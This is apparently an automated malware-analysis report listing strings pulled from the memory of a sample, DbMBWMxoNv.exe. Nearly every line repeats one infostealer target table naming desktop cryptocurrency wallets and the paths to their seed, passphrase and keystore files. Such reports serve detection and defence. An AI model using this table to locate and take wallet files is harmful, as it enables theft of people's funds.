Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: DbMBWMxoNv.exe, 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia 